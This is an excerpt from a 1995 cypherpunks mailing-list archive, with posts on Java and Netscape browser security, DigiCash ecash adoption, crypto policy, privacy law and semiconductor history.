they imported to make their browser read the files they want to read. 

If companies claim a secure browser, it should be secure regardless of
the typical errors and omissions made by the least sophistocated user.

> [web browsers don't destroy hard drives, numbskulls with mice do]

Current Web browsers are unsafe - so are most current users.  Bullets
kill people, but for the most part, people pull the triggers, and a gun
is the enabling technology.  When you hand millions of people who know
nothing about guns with loaded oozies and put them into crowds, you can
hardly claim no responsibility when they start shooting each other. 

-- 
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Fri, 17 Nov 1995 12:55:28 +0800
To: Steve Champeon <schampeo@imonics.com>
Subject: Re: Java & Netscape security [NOISE]
In-Reply-To: <v02120d00acd1aa2c9cf1@[205.139.212.66]>
Message-ID: <Pine.SOL.3.91.951116225922.14202B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


c~ZX^\rR 


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Fri, 17 Nov 1995 09:15:46 +0800
To: cypherpunks@toad.com
Subject: Re: Public Domain?
Message-ID: <v01510103acd15b8b72af@[193.74.216.47]>
MIME-Version: 1.0
Content-Type: text/plain




>But the researchers backed out of the idea on the advice of our patent
>lawyers.  The reasoning goes like this:  Sending anything over the Internet
>is equivalent to placing it into the public domain, since the message can
>be viewed by other than the intended recipient.  So, proprietary
>information *even encrypted* will be rendered unpatentable if sent over the
>Internet.
>

You may want to send these guys back to do their homework.  For corporate
communications, crypto is not new.  Messages have been sent in cipher over
telegraph lines since the civil war.  Ask if a trade secret becomes exposed
(in the legal sense) if it is transmitted over telegraph lines in code.

I fail to see what the difference is between enciphering something in dots
and dashes and enciphering it in 1's and 0's.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 17 Nov 1995 15:23:26 +0800
To: bryce@colorado.edu
Subject: Re: Mark Twain Bank ecash scripts needed
Message-ID: <199511170707.XAA07527@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:25 PM 11/16/95 -0700, Bryce wrote:
>I am in the process of setting up a shop using Mark Twain Bank
>Ecash.  Could someone please forward me the scripts to accept Ecash
>(running on SunOS.  On c2.org actually) and/or any advice you have

http://www.digicash.nl/mt/
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 17 Nov 1995 13:11:28 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Mandarins, Lifers, and Talents
Message-ID: <v02120d0eacd1b471dc1d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>It really did not happen because of cheerleaders. This is a recurring
>belief of mine, notably in my occasional interactions with the nanotech
>community, as a few members of this list can attest to. The "Rah, Rah"s--no
>pun intended--play a minor role in adoption of new products and
>technologies.

Tim, you can't tell me that there weren't people who were just plain fired
up about the prospects for any really serious technology. Where are you
living, the Gernsbeck Continuum? Tim, those "cheerleaders" are the ones who
either get fired up to do something themselves, or if they can't, they get
people either fired up to buy stuff, or fired up to build stuff. Howard
Hughes was one. Hell, the Wright brothers were. So are you, Tim, only your
passion is strong crypto and cryptoanarchy. Mine is this geodesic market
stuff...


>One argument I am never persuaded by is the hackerish "Feh." (Does anybody
>but hackers use this strange word?)

Ah. Well, Tim, "Feh" is yiddish, actually. Just like "hacker" comes from
electric trains. If you don't believe me on *that* one, ask Mr. Levy, who
knows all about the MIT Model Railroading Club...

>In any case, I'm not interested in "doing better than that." My support for
>Chaumian e-cash goes back to 1987. As to why I didn't sign up for Magic
>Money, or E-Purse, of Digibux, or whatever, well, I'm not a merchant. Just
>as one could study flight, to use Bob's example, without operating a
>passenger service or a flying school, so one can be interested in digital
>cash without "opening an account."

Right on, Tim. Just don't rain on my parade, or anyone else who's trying to
make something happen, for that matter.


>Ah, but I never claimed otherwise (perhaps this is what you mean by "your
>nonexistant point"). My point was only that digital cash will happen mostly
>when it fills a need, or is accepted by customers, not by cheerleading and
>by urging people on this list to be pioneers.

Cart before the horse, Tim. Most of the new people (say, for 2 years at
least) on this list *are* pioneers. I've got 600 people over on www-buyinfo
who are there primarily because 90% (!) of the traffic on it is my
e$-filtered cross-posts from cypherpunks, and I don't know how many are
over here because they like their whiskey neat. Those people are so fired
up, they will find a need, or *create* one, if they have to.

>The theories about mandarins, lifers, and talents I'll discuss at another
>time, maybe. All I'll say is that I think it's too simple a categorization.
>Maybe it's a Boston viewpoint.

Damn Yankees. Born in El Paso, myself, by way of St. Thomas, Las Cruces,
Corpus Christi, El Paso, Anchorage, St. Louis, Mid-MO, Chicago, and yes,
Boston. Never knew I was one until you told me...

>The folks I've worked with over the years
>bear almost no resemblance to any of these categories.

Typical Mandarin response. ;-). (just pulling your leg, Tim. Put the Glock
*down*...)

>In any case, people
>will start using digital cash if and when it fulfills some need, or some
>need they never knew they had, gets stimulated.

Agreed.

>
>On a personal note--which is weird, since 1000 or more people may be
>reading this message, though most probably haven't read this far--I think
>it best not to get too emotionally attached to some particular outcome in
>the introduction of a new technology.

I bet they are, but I'm not attached to Mark Twain or even Digicash per se.
It just seems to me, that if you want to get involved in this flying stuff,
here's a plane that flies, even if its elevators are stuck on the front.
Learn to fly now, and be able to fly the new stuff as it becomes available.
If you want to fly, that is. Some people then couldn't help it. They *had*
to do it. That's what's happening here, Tim.

>I've seen many "prophets" wailing to the world that their
>visions _deserve_ success.

Not here Tim. I believe you might be projecting, or something. I just want
to sell stuff for cash on the net. Then, I want to surfact the financial
markets into little tiny pieces...

>The technologies which hit the right chord rarely need, or benefit from,
>the "evangelists" and "cheerleaders." The Macintosh did not Guy Kawasaki or
>any of the other so-called evangelists to succeed. The microprocessor did
>not evangelists. The airplane did not. The VCR did not. The cellular phone
>did not.

I don't believe that for a minute, and on reflection, you probably don't
either. Jerry Sanders at AMD. Hell, Tim, you knew Moore, for god's sake.
Think about, oh, the Sony guy, whatever his name is, Morita. The people who
built the Mac were *possessed*. So was Kawasaki. I'm *still* possessed.
What about the *entrepreneur's* reality distortion field. I bet you've seen
more than a few, and probably more than a few who were right, or you
wouldn't be thrashing your Mac on the net and clipping coupons...


>And I can think immediately of several
>technologies that had active proselytizers--Ted Nelson, Doug Engelbart,
>Marty Lepselter, Steve Jobs, Eric Drexler, fusion enthusiasts, space
                                                                ^^^^^
>enthusiasts--but in which progress has been stalled or proceeded along
^^^^^^^^^^^^
>different paths for different reasons.

I resemble that remark. Sure, Tim some of them didn't make it. But for
every one of those (strange you should mention Jobs, right after I mention
the reality distortion field, and don't count him out yet, rumor has it
Ellison wants him to run Apple when Oracle buys it, god help us all), there
are others who did exactly that. Von Braun, or Porsche, or, hell, all I can
think of are germans, uh, okay, Bill Gates.

>This is a very interesting area for me, and I used to write extensively
>about it. Nick Szabo and I had several debates about this, a couple of
>years ago. However, no time now to discuss the full implications here.

Having been hammered by Nick myself, once or twice, I think I understand this...

So. I'm enthused. My enthusiasm is demonstrably contagious. If someone gets
enthusiastic about all this on my account, and puts up the king-hell,
world-beater, financial-cryptography-killer-ap that's cool by me.
Otherwise, it's only bandwidth, which I've wasted enough on for this
thread. If you want to make the rubble bounce, go for it.

Besides, I usually stay in my cage, these days. Which is where I'm going to
go and lurk for another month or so...

Cheers,
Bob Hettinga

PS: Feh

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 17 Nov 1995 18:46:12 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <199511170734.XAA12528@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:13 PM 11/16/95 -0600, Scott Brickner wrote:
>The problem is that the non-encryption program must use the same
>interface as the encryption program.  Text compression is often cited
....
>You'd need a program which not only *accepted* the additional parameter,
>but also *needed* the second parameter.  I confess I have some difficulty
>thinking of one.

If you support user-specified program/module interface which take
arbitrary string-valued arguments (e.g. Unix-style stuff or objects),
and you've got negotiation methods that can accept args,
then you've got a very general system which they shouldn't
be able to argue with - so the drop-in authors can hand the keys around
as 0xHEX-strings rather than bignums without the program needing to know.
Sorting and backup systems often want lots of options.

If you decide for reliability reasons to insist on registered module names,
to prevent problems like six different sorting modules with different
argument orders, or backup modules with different ideas of "original" and "copy"
(switching those two can be _Very_ annoying!), then there's even a mechanism
which the crafty foreigner to distribute modules and documentation!

>> An abstract set of open/modify/close
>> routines (where open returned a pointer to opaque state, say a session
>> key :) would be fine.

#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 17 Nov 1995 18:46:16 +0800
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION BECOMES FIRST INTERNET PROVIDER TO ACCEPT ECASH
Message-ID: <199511170805.AAA10143@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release - November 17, 1995
Contact: Sameer Parekh sameer@c2.org 510-601-9777

COMMUNITY CONNEXION BECOMES FIRST INTERNET PROVIDER TO ACCEPT ECASH

Community ConneXion today announced that it has become the first and
only Internet Service Provider in the world to allow for payment using
ecash, a digital cash system developed by DigiCash bv, of Amsterdam,
Holland, released jointly with Mark Twain Bank, of St. Louis,
Missouri.

On October 23rd, DigiCash bv announced jointly with Mark Twain Bank
that they would be issuing ecash denominated in real U.S. Dollars. In
the past DigiCash had been running a trial "CyberBucks" payment
system, which was not backed by any strong currency; it was a form of
"Monopoly Money". 

The ecash system provides full payor anonymity. Consumers can use
ecash tokens to pay for goods on the Internet, with full anonymity
from the merchants. This lets consumers buy things without fear of
merchants compiling and selling databases of their spending habits. It
also allows for a convenient and safe mechanism for payment through
the Internet.

Sameer Parekh, President of Community ConneXion, said that ecash is a
significant improvement over the payment systems widely in use on the
net today. He described one example, "Currently people usually just
send their credit card numbers over the net to the merchant if they
want to buy something. This opens up the security risk of having the
merchant's computers broken into; every consumer's full credit limits
are then subject to attack. With ecash, only the limited sums that
have been spent are at risk."

Community ConneXion has begun accepting ecash as payment for its
services, offering a five percent discount for customers who pay with
ecash. "It simplifies our accounting and protects the privacy of our
clients; it is to everyone's benefit to use ecash," said Parekh.
"Ecash has greatly simplified account creation procedures for our
anonymous accounts. In the past someone creating an anonymous account
would need to wait until their payment arrived, and their check
cleared, before the account could be created; now, the account is
created automatically, immediately after the ecash payment is made
over the world-wide-web."

Community ConneXion is the leading provider of privacy on the
Internet. They provide anonymous and pseudonymous internet access and
web pages in addition to powerful web service, virtual hosts, and web
design consultation. Information is available from their web pages at
http://www.c2.org/. Information about the Mark Twain Bank ecash
release is available from http://www.marktwain.com/ecash.html.

DigiCash, CyberBucks, and ecash are trademarks of DigiCash bv. Mark
Twain Bank is a trademark of Mark Twain Bancshares. Monopoly is a
trademark of Parker Brothers, Division of Tonka Corporation.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 17 Nov 1995 17:17:12 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199511160333.WAA08987@jekyll.piermont.com>
Message-ID: <30AC4F87.7BDB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Matthew James Sheppard wrote:
> I've got to note just one thing -- what about the Netscape LiveScript
> language?  is it opening up the same security can of worms as java?  I
> realise that it provides functionality specific to browsing only (no
> network/files) but the potential for bugs when you add another
> language must increase.

  One advantage that livescript has is that it was designed and
implemented by one individual, removing communication problems
as a possible source of holes.

  We are reviewing the set of reflected objects for possible security
problems, and will be taking a conservative approach to what we
include.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Sat, 18 Nov 1995 16:32:04 +0800
To: cypherpunks@toad.com
Subject: SA: Confidential Communication on the Internet
Message-ID: <Pine.SUN.3.90.951117010848.21461A@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On the December issue of Scientific American there is an article
by Thomas Beth, "Confidential Communication on the Internet".
Lite on the technical side but good reading anyway.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Fri, 17 Nov 1995 18:01:29 +0800
To: cypherpunks@toad.com
Subject: Ecash account
Message-ID: <199511170930.CAA00682@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


So who here is going to use their ecash account to set up a money
lau^H^H^Hexchange service?
 
Ob Cyphernoise: Would Dr Fred, Alice, and any other names LD has set up
for himself lately please keep the noise limited to email? Please?
 
Ob Plonk: amen. So let it be written, so let it be plonked.
 
Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Fri, 17 Nov 1995 18:46:51 +0800
To: cypherpunks@toad.com
Subject: No Privacy Right in UK ?
Message-ID: <Pine.BSD.3.91.951117025209.5772G-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
 
                      Cypherpunks assume privacy is a good thing 
                      and wish there were more of it. 
 
                                        --Welcome to cypherpunks 
 
 
 
Friend, 
 
 
11 16 95 The Electronic Telegraph runs a newsstory headed 
 
   Doorstep polish researcher was whiplash injuries spy 
 
 
Here are excerpts from the newsstory: 
 
   Miss [Natalie] Goldner had been hurt when a car in which 
   she was a passenger was hit from behind in April 1988, 
   and she was forced to leave her video library job. 
 
   Shortly after the accident, she started a claim for compen- 
   sation and future loss of earnings against the Royal Insur- 
   ance Company. 
 
   ...Margot Christie...was working for the Hampshire Detec- 
   tive Agency when she went to Miss Goldner's house in Octo- 
   ber 1991. 
 
Christie posed as a market researcher. 
 
   It was only when a compensation claim reached court that 
   Miss Goldner realised the "researcher" was a private de- 
   tective hired to discover the extent of her injuries. 

   In a report which was due to go before the court, Mrs Chris- 
   tie said she had asked Miss Goldner to test some polish 
   and window cleaner. 
   
   [Christie] returned 11 days later.  "I asked the plaintiff 
   if the polish had given a good shine and if she had rubbed 
   hard. The plaintiff said 'Yes I did, it didn't smear at all'." 
 
Natalie lives with her mother. 
 
   "I felt as though we had been burgled.  I felt violated.  We 
   were so worried afterwards that we just didn't trust anyone 
   who turned up at our door. 
 
   "She asked lots of questions about who did the housework 
   in our house.  We were just chatting away and I had no idea 
   she was there to spy on me." 
 
Natalie settled out of court. 
 
   In September, she accepted a 20,000 [pound] settlement after 
   one day of a planned four-day court hearing. 
 
   She is to lodge a complaint with the Association of British 
   Investigators.... 
 
Fortunately, the Daily Telegraph publicized the case.  The news- 
story points out: 
 
   A spokesman for Liberty, the civil rights group, said:  "There 
   is no right to personal privacy in Britain and so it [invasion 
   of privacy by deception] is not against the law." 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  The Electronic Telegraph can be accessed at 
 
                 http://www.telegraph.co.uk 
 
 
       The online filename of the above newsstory is: 
 
                        nspys16.html 
 
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Fri, 17 Nov 1995 12:00:45 +0800
To: cypherpunks@toad.com
Subject: Re: COE Recommendation No. R (95) 13
In-Reply-To: <9511160302.AA17272@www18.w3.org>
Message-ID: <Pine.HPP.3.91.951117024147.26779A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 Nov 1995, Phillip M. Hallam-Baker wrote:

> I think the majority of the text is well thought out and very much in
> line with what we would want.

How about this:
________________________________________________________________________
9. Subject to legal privileges or protection, most legal systems permit
investigating authorities to order persons to hand over objects under
their control that are required to serve as evidence. In a parallel
fashion, provisions should be made for the power to order persons to
submit any specified data under their control in a computer system in the
form required by the investigating authority.
________________________________________________________________________

Is this 'what we would want'? It clearly means that one can be ordered
to reveal the password to encrypted data and punished by law if one
refuses. Suppose they suspect you of being a child pornographer and
get a court order to search your encrypted system. You know you are
innocent. Is it acceptable to put you in jail for not giving them access
to your encrypted, very personal diary (in which you describe in detail
your sexual encounters with the wife of the Chief of Police)?

And how about this: 
_______________________________________________________________________
14. Measures should be considered to minimise the negative effects of the
use of cryptography on the investigation of criminal offenses, without
affecting its legitimate use more than is strictly necessary.
_______________________________________________________________________

Is this really just a toothless statement to give to the French?
Couldn't it as easily be interpreted as not wanting to go into
details yet (since no real system is available) but stating that
some form of GAK is on the agenda? Surely, law enforcement
bureaucrats would not consider GAK to affect the 'legitimate
use' of cryptography 'more than is strictly necessary'.

Mats








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 17 Nov 1995 21:04:51 +0800
To: cypherpunks@toad.com
Subject: Electronic Records in NYS
Message-ID: <199511171239.HAA17717@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain



>From another list:
Forwarded message:
Date:         Thu, 16 Nov 1995 09:52:50 -0500
Sender: Computer-assisted Reporting & Research <CARR-L%ULKYVM.BITNET@uga.cc.uga.edu>
From: Ann Marie Przybyla <APRZYBYL@MAIL.NYSED.GOV>
Subject:      Electronic Records User Survey
X-To:         CARR-L@ulkyvm.Louisville.edu
To: Multiple recipients of list CARR-L <CARR-L%ULKYVM.BITNET@uga.cc.uga.edu>

This message is being posted to several lists; please excuse any
duplication

****************************************************************

Colleagues:

The New York State Archives and Records Administration (SARA) has
acquired four significant electronic data sets generated by New
York State agencies, including the Department of Education and
the Department of Correctional Services.  To enhance access to
the data sets, SARA is conducting a survey targeted at
researchers who use machine-readable data and statistical
analysis for their work.

A high level of participation in this survey would be very
helpful. If you would like to participate, please contact:

Ann Marie Przybyla
Electronic Records and Networking Services Unit
New York State Archives and Records Administration
aprzybyl@mail.nysed.gov


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wiltship@iccu6.ipswich.gil.com.au (PeterWiltshire)
Date: Fri, 17 Nov 1995 09:41:46 +0800
To: cypherpunks@toad.com
Subject: Re: Need advice on video
Message-ID: <199511162222.JAA05710@iccu6.ipswich.gil.com.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Ben wrote...

<stuff deleted>
>What I'm fishing for here are any suggestions for ways to present
>some of this content in an interesting video setting.  We've already
>decided on doing some algorithm animation, and maybe some simple
>moving graphics illustrating the various protocols.  Any ideas you
>might have would be appreciated.

Firstly you will need to clearly define for yourself exactly what you want the
audience to know by the end of the programme... the content.  And what you 
want them to feel by the end of the programme too.. you obviously want them 
to have positive feelings about crypto.  You might also consider some broader 
political issues to be cleanly interwoven through the script too.

Then, you might like to think about the WHO, WHEN, WHERE and WHY of crypto.  
A bit of an historical background on cyphers would put todays crypto into 
context, too.  Make sure that you keep giving the audience enough knowledge
to comprehend stuff you will be presenting towards the end of the video...
all of the
information you present needs to build on what you have already presented.

Closely examine your scripts for jargon.  Take out any that you can't
explain clearly.
Too much jargon can swamp the audience and they will be distracted from
important
content while they try to remember what a particular word means.


>BTW, once we finish this and show it locally, we are considering
>doing some duplication to send out to interested bodies.  Do you
>think there is demand for a good, clear intro to all this in video
>form?
>

I'm sure there is a need for this sort of programme that is produced well and
is reasonably priced.  Remember to get signed releases from EVERYONE involved 
in the project, not just ppl on camera, so you can sell the programme
ANYWHERE IN 
THE WORLD if you choose to.

Don't be misled, I'm sure there are quite a few programmes out there on this
very topic.
Yours needs to be significantly different and entertaining.  I would suggest
you have an 
opportunity to make a video from 'the inside', given the ppl on this list
and the contacts 
they have.  A lot of films sre good introductions to a subject without
standing up and 
calling them such... like if I was making a video about Phil I would have to
explain crypto
and its use as a way of reaching a level of understanding for the audience.

Hope this is of some help.


>Thanks,
>-- 
>        eebmoC .L nimajneB | Benjamin L. Combee                (REVERSE) 
>       gro.doowhcet@eebmoc | combee@techwood.org           (ENGINEERING) 
>\eebmoc\ten.kay.www\\:ptth | http://www.yak.net/combee/        (RESERVE)
>


Cheers

Peter

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKu5bOvjRao+WEx9AQHKhQQAhOGT7fecYsaiwCDa6d8Ka7J6Hsgwuw5D
tcknrSNVZGSf3+GCHWWVvCgsqHbgd+T9W/xFE9wlwzBmnbL9OwLb8sGr6yYDljL4
KH474GmKrax2hmu3h24J7HbsdTGDwj/KTrWnW4Kc+5TVIdhe0TM7SQBAMfWsYhuP
2YaxW3QYoTg=
=zt0k
-----END PGP SIGNATURE-----







                                             Flight to Quality
                                 Wiltshire Productions Pty Ltd
                              Brisbane, Queensland, Australia
               Intl Voice  61 7 3376 3535  Intl Fax  61 7 3279 4027
              Email wiltship@gil.com.au  PGP Key ID 3E584C7D
  PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Fri, 17 Nov 1995 21:59:29 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Java & Netscape security (reply to misc. postings)
In-Reply-To: <199511170439.UAA19926@netcom17.netcom.com>
Message-ID: <199511171345.IAA19681@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
> After reading http://java.sun.com/1.0alpha3/doc/security/security.html my
> (possibly faulty) understanding of Java security is that it will not allow
> an applet to speak to IP addresses other than the one it was loaded from. 
> I have a question:

FYI.

According to an interview I did with Sun. Inter applet communcation, btw,
can only occur between applets from the same IP address, same domain name
and on the same page...

/hawk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 18 Nov 1995 01:57:27 +0800
To: cypherpunks@toad.com
Subject: Corrections about Bob Noyce and Intel
Message-ID: <acd204fa000210047be5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:55 PM 11/17/95, attila wrote:

>   2.  most were pioneers: a specific example is Bob Norris who walked
>       out of a Fairchild board meeting being being rejected for his
>       eighth try at replacing Germanium because the first seven had
>       failed. A couple of VCs, among them Arthur Rock and Bob Perring
>       said: "...we believe you, let's try silicon..." and we have Intel.

Bob Noyce was already making silicon devices at Fairchild. The "planar
process" was developed by him in the late 50s. It is not the case that
Fairchild was stuck making germanium, nor that Intel was the first to use
silicon. I could go on about the actual history, but this is far from the
themes of this list, and many books cover the history very well.

What Intel pioneered the development of was _silicon-gate MOS_, where the
aluminum gates of traditional silicon devices is replaced with polysilicon
gates. Intel did this by hiring the silicon-gate gurus from Fairchild
(Vadasz, Grove, Faggin, etc.).

>       But, who drives Intel today? --Grove, who is labelled as the
>       founder.  Grove made the _business_ -the brains have been
>       forgotten. Norris was the darling of the VCs for a couple years
>       until they figured he couldn't spot a _financial_ success.

Grove remains a technologist--I studied semiconcuctor physics from his
wonderful 1967 book, "The Physics and Technology of Seminconductor
Devices"--and the group that leads Intel is highly technical. Gordon Moore
remains connected, materials scientist Craig Barrett (who hired me into
Intel in '74, ironically) is next-in-line to be President, Gerry Parker is
a top technologist, and so on.

As to Bob Noyce being the "darling of the VCs for a couple of years until
they figured he couldn't spot a _financial_ success," I should just let
that one pass. Noyce of course has been dead for several years. When he was
alive, though, he "spotted" several financial successes.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: grdawe@toad.com
Date: Sat, 18 Nov 1995 02:42:52 +0800
To: cypherpunks@toad.com
Subject: RE: nnets & crypto
Message-ID: <Chameleon.951117113552.gweissma@altonet.com>
MIME-Version: 1.0
Content-Type: text/plain




IMHO etc., *any* time there is an application involving pattern-matching and analysis of complex in->out 
relations/functions there is a possible application of NN's.  That's not to say that a particular application 
would be a panacea, but designed properly I think an NN could be of value in differential crypto, discovering 
crypto-weak (i.e. strong) correlations between in->out, etc.  My intuition says there is or can be value as a 
tool for the cryptanalyst.

I would also not discount the use of NN's in ENcrypting, given the capability of NN's realizing (almost) any 
arbitrary, nonlinear function from in->out. 

Caveat: practical considerations not accounted for in these opinions. 



>Date: Fri, 10 Nov 1995 11:52:41 -0800
>From: Bill Stewart <stewarts@ix.netcom.com>
>Subject: Re: coding and nnet's

>Schneier's 2nd edition says "Neural nets aren't terribly useful for
>cryptography, primarily because of the shape of the solution space.

>Neural nets work best for problems that have a continuity of
>solutions, some better than others. This allows a neural net to
>learn, proposing better and better solutions as it does. Breaking an
>algorithm provides for very little in the way of learning
>opportunities: You either recover the key or you don't. (At least
>this is true if the algorithm is any good.)

Has anyone tried using neural nets or similar techniques for
searching for useful nonrandom properties of the round functions of
block ciphers or hash functions?  This might be useful in trying to
prepare some new kind of attack, find a balanced binary function
that is useful in using the generalization of linear cryptanalysis
discussed by Harpes, Kramer, and Massey at Eurocrypt '95, find a
better "difference" function for use in a differential attack, etc.

>Neural nets work well
>in structured environments when there is something to learn, but not
>in the high-entropy, seemingly random world of cryptography." And he
>doesn't give any references.

Merkle's paper on Khufu and Khafre addresses this idea, I think.
Merkle comments that it's not going to be useful against a full
cipher, but that it might be useful against (say) Khufu with one or
two octets.

>#				Thanks;  Bill
># Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
># Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKhv1UHx57Ag8goBAQE5IAQAtV3GTqZO08WwHDJSI3Dj2NgIu7rQPrUH
V5vBCWTCvRsVNt07K8FbKMxPhF+QmXINPlOEMn4qZbhph0oyf/zAj3uV+6yzO3Eg
FMXrZzc1zOOdcfp9IcMvoXvd/av9zq/jH6Sn6yZB3jTO42ENeSSLNbxtaBrzgABl
zPklYWOnDrw=
=x3kP
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 17 Nov 1995 23:53:13 +0800
To: pcw@access.digex.net
Subject: Cornell Cracks Down on Private E-MAIL...
Message-ID: <199511171522.KAA11733@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by pcw@access.digex.net (Peter Wayner) on 
Fri, 17 Nov  9:47 AM

----------

   The New York Times, November 17, 1995, p. B8. 


   Penalties Decided in E-Mail at Cornell

   Cornell University has reached agreement with four students
   on punishment for a widely distributed E-mail message they
   wrote listing "75 reasons why women should not have freedom
   of speech." The university rejected harsh penalties like
   suspension because the students did not engage in sexual
   harassment, university officials said yesterday.

   The university had investigated complaints of sexual
   harassment and misuse of computer resources after the
   message made its way on the Internet last month, angering
   thousands of computer users who sent angry responses to the
   four students. The message included the lines, "If she
   can't speak, she can't cry rape" and, "Of course, if she
   can't speak, she can't say no."

   The university said the students had agreed to attend a
   program dealing with date and acquaintance rape, and would
   perform 50 hours of community service.

   -----

   There was a somewhat longer NYT article a day or two ago;
   anybody want it, send your PIN_kie.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Sheppard <Matthew.Sheppard@Comp.VUW.AC.NZ>
Date: Fri, 17 Nov 1995 09:47:26 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199511160333.WAA08987@jekyll.piermont.com>
Message-ID: <199511162130.KAA04423@paramount.comp.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


The shadowy figure took form and announced "I am "Perry E. Metzger" and I say .
..
> Jeff Weinstein writes:
> > All of these security measures are implemented by Netscape in the
> > current release.  Specifically, Netscape Navigator 2.0beta2
> > includes all the applet security precautions detailed in the recent
> > comp.lang.java posting.  Netscape has been shipping the fixed
> > applet security model for over a month(since 2.0Beta1)...
> 
> I've got to note just one thing -- every Netscape 2.0beta2 I've used
> has been so full of bugs, and so prone to problems, that I have my
> wonders about what the security code looks like.

Well beta2 is heaps better than beta1, I can still crash beta2 with or
without java under win3, sgi, solaris and alpha but it has to be used
